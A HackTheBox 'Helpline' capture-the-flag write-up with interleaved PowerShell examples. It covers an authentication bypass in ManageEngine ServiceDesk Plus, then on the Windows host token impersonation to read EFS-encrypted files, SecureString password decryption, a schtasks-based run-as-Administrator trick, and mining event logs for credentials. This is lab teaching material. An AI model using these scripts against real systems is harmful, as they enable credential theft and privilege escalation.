HTB Helpline writeup (English)
Thanks egre55. I've learned a lot from this machine!
Also, big thanks to ATK and Senn for helping me to solve this challenge!
Overview
- Even with the highest privilege (SYSTEM), the flags were not readable
--> EFS encrypted. Two ways to decrypt. Even in constrained language mode, you can still decrypt the file.
- There is a harder way to get the flag:
http://blackpentesters.blogspot.com/2017/01/decrypting-efs-encrypted-files.html
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
- schtasks is your friend; bypass UAC
"Attack tree"-ish mind map
Port Scan
root@kali:~/hackthebox/Helpline# nmap -A -p- 10.10.10.132
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http-proxy -
|_http-title: ManageEngine ServiceDesk Plus
SMB didn't give out any information. In such cases, I always look into the web applications.
Web application authentication bypass
Quickly google the application and the version; I found a seemingly working exploit. By the way, never ever run exploits blindly without reading the code carefully!
Logged in as "guest"
replace the cookies with the ones shown in the exploit
Admin!
I found "Custom Schedule" with an "Executor" function. It looked like OS commands could be run from there.
At this point I had no idea what privileges the application was running with. Worth testing whether outbound connections are allowed.
powershell in-memory attack
I used my favorite "Nishang".
nishang
https://github.com/samratashok/nishang
SYSTEM priv? Hmm... strange. Too good to be true.
Anyway, where are the flags?
PS C:\Users> get-childitem -recurse
Directory: C:\Users
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/20/2018 11:09 PM 32 root.txt
Directory: C:\Users\leo\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/15/2019 12:18 AM 526 admin-pass.xml
Directory: C:\Users\tolu\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/20/2018 11:12 PM 32 user.txt
See? This is definitely a big problem!
Darn, EFS. Honestly, I'm not good at openssl mumbo-jumbo.
Token impersonation
The quickest way to decrypt is token impersonation: EFS decrypts with the owning user's private key, so a process running as that user can read the file.
I confirmed that a process owned by leo was running.
admin-pass.xml contains a long hex string. After some googling, I realized it is a PowerShell SecureString.
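Before impersonating anyone it is worth confirming that EFS really is the obstacle and that a token for the right user exists on the box. The following is an added example, not code from the original writeup; it uses the paths and user names from the directory listing above and assumes it is run from the SYSTEM shell (Get-Process -IncludeUserName needs elevation). Invoke-TokenManipulation (PowerSploit) and incognito are named only as the usual tools for the impersonation step.

```powershell
# Added example (not from the original writeup): confirm the files are EFS-encrypted,
# list which users' certificates can decrypt them, and find processes that already
# hold the owning user's token. Paths and user names are the ones from the writeup.
$targets = 'C:\Users\tolu\Desktop\user.txt',
           'C:\Users\leo\Desktop\admin-pass.xml',
           'C:\Users\Administrator\Desktop\root.txt'

foreach ($f in $targets) {
    $item = Get-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue
    if (-not $item) { continue }
    # The Encrypted attribute is why SYSTEM still cannot read the content: EFS is
    # enforced by the owner's private key, not by NTFS permissions.
    $efs = ($item.Attributes -band [IO.FileAttributes]::Encrypted) -ne 0
    "{0,-45} encrypted={1}" -f $f, $efs
    if ($efs) {
        # cipher /c lists the users (and certificate thumbprints) able to decrypt the file
        cipher /c $f
    }
}

# Any process already running as the owning user carries a token that can be
# impersonated (e.g. Invoke-TokenManipulation or incognito). Requires elevation.
Get-Process -IncludeUserName -ErrorAction SilentlyContinue |
    Where-Object { $_.UserName -like '*\leo' -or $_.UserName -like '*\tolu' } |
    Select-Object Id, ProcessName, UserName
```

If cipher /c shows only the owner and no recovery agent, impersonation (or the owner's own logon session) is the only practical route; the check also tells you which user you need a token for.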
Powershell Secure string
There are two ways to decrypt a PowerShell SecureString. The first one didn't work due to constrained language mode.
GetNetworkCredential worked.
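The two techniques referred to above, side by side, as an added example that is not part of the original writeup. The important caveat: a SecureString exported with Export-Clixml (or ConvertFrom-SecureString without -Key) is protected with DPAPI under the exporting user's key, so either method only succeeds while running as that user, which is why leo's token was needed. The file path is the one from the writeup; if it is absent the script builds an equivalent file with a constructed password so it can be dry-run anywhere.

```powershell
# Added example (not from the original writeup). admin-pass.xml holds a SecureString
# (or a PSCredential) exported with Export-Clixml; the long hex blob is DPAPI-encrypted
# under the exporting user's key, so run this as that user (leo, via the impersonated token).
$xmlPath = 'C:\Users\leo\Desktop\admin-pass.xml'   # path from the writeup

# Stand-alone dry run: build an equivalent file with a constructed password.
if (-not (Test-Path $xmlPath)) {
    $xmlPath = Join-Path $env:TEMP 'admin-pass-demo.xml'
    $demo = New-Object System.Management.Automation.PSCredential(
        'Administrator', (ConvertTo-SecureString 'Demo-Pass-123' -AsPlainText -Force))
    $demo | Export-Clixml -Path $xmlPath
}

$obj = Import-Clixml -Path $xmlPath
# The file may contain a bare SecureString, a PSCredential, or a raw hex string.
$secure = switch ($true) {
    ($obj -is [System.Security.SecureString]) { $obj; break }
    ($obj -is [string])                       { ConvertTo-SecureString $obj; break }
    default                                   { $obj.Password }
}

# Way 1: marshal the SecureString to a BSTR. Fails under ConstrainedLanguage because
# [Runtime.InteropServices.Marshal] is not one of the allowed core types there.
try {
    $bstr  = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)
    $plain = [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
    [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
    "Marshal:              $plain"
} catch {
    "Marshal failed (LanguageMode=$($ExecutionContext.SessionState.LanguageMode)): $($_.Exception.Message)"
}

# Way 2: PSCredential is on the ConstrainedLanguage allow-list, and
# GetNetworkCredential() performs the DPAPI unwrap for us. The user name is irrelevant.
$cred = New-Object System.Management.Automation.PSCredential('x', $secure)
"GetNetworkCredential: " + $cred.GetNetworkCredential().Password
```

Running it as a different user (or on a different machine) makes both ways fail with a DPAPI error ("Key not valid for use in specified state"), which is the quickest way to tell "wrong token" from "wrong technique".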
Getting root.txt
I could log on to the target via psexec.py, but "whoami" still showed "SYSTEM", and SYSTEM has no access to Administrator's EFS key, so the flag stays unreadable. So I decided to use schtasks to run as Administrator proper. Believe it or not, the good old technique still works!
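The schtasks trick spelled out, as an added example (not the original writeup's commands). It assumes the Administrator password recovered from admin-pass.xml is known (placeholder below), that it is run from the SYSTEM shell, and it picks its own task name and output path.

```powershell
# Added example (not from the original writeup): read Administrator's EFS file by running
# the command in Administrator's own logon session instead of as SYSTEM.
$user     = 'Administrator'
$password = 'PASSWORD_FROM_ADMIN-PASS_XML'   # assumption: recovered from admin-pass.xml earlier
$taskName = 'htb-readroot'                    # arbitrary task name
$out      = 'C:\Users\Public\root.txt'        # unencrypted folder, so the copy is plaintext
$cmd      = "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > $out"

# /ru + /rp: run with that account's real credentials (so its EFS key is usable).
# /rl HIGHEST: full, non-UAC-filtered token; this is the "bypass UAC" part.
# /sc ONCE needs a /st time, but /run fires it immediately regardless.
schtasks /create /f /tn $taskName /tr $cmd /sc ONCE /st 00:00 /ru $user /rp $password /rl HIGHEST
schtasks /run /tn $taskName

# The task runs asynchronously; wait briefly for the output file.
$deadline = (Get-Date).AddSeconds(30)
while (-not (Test-Path $out) -and (Get-Date) -lt $deadline) { Start-Sleep -Seconds 2 }
if (Test-Path $out) {
    Get-Content $out
} else {
    "no output; inspect with: schtasks /query /tn $taskName /v /fo LIST"
}

# Clean up: remove the task and the plaintext copy.
schtasks /delete /f /tn $taskName
Remove-Item $out -ErrorAction SilentlyContinue
```

The same pattern (with /ru tolu and tolu's password) is what the user.txt step below comes down to once tolu can run tasks with highest privileges.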
Getting user.txt
zachary belongs to "Event Log Readers". It seems the author wants me to read the event logs. Let's compile all the logs into a single text file and grep for "tolu".
$logfile = Get-Content .\test.txt
$logfile | Select-String -Pattern 'tolu'
Yeah, there it is.
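Rather than exporting every log to a text file first, the same search can be done directly against the logs, which is what "Event Log Readers" membership permits even for a non-admin. This is an added example, not the original writeup's commands; it assumes it runs as zachary and uses "tolu" as the search term from the writeup.

```powershell
# Added example (not from the original writeup): search every readable event log for a
# user name. Members of "Event Log Readers" can read all logs, Security included, without
# being local administrators.
$needle = 'tolu'   # user name from the writeup

# Confirm the membership the whole step depends on.
net localgroup "Event Log Readers"

$hits = Get-WinEvent -ListLog * -ErrorAction SilentlyContinue |
    Where-Object { $_.RecordCount -gt 0 } |
    ForEach-Object {
        # Read log by log; a few logs are denied even to the group, so ignore errors.
        Get-WinEvent -LogName $_.LogName -ErrorAction SilentlyContinue
    } |
    Where-Object { $_.Message -match $needle }

# 4688 (process creation with command-line auditing) and 4648 (explicit credentials)
# are the usual events that leak passwords into the log, so the Id column matters.
$hits | Sort-Object TimeCreated |
    Select-Object TimeCreated, LogName, Id, ProviderName,
        @{ n = 'Snippet'; e = {
            $m = $_.Message -replace '\s+', ' '
            $m.Substring(0, [Math]::Min(200, $m.Length))
        } } |
    Format-List
```

Filter by Id (for example Where-Object Id -eq 4688) once the first pass shows which log the hit lives in; the full Message of that single event is usually the whole story.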
After adding "tolu" to the local Administrators group, the rest is the same as above.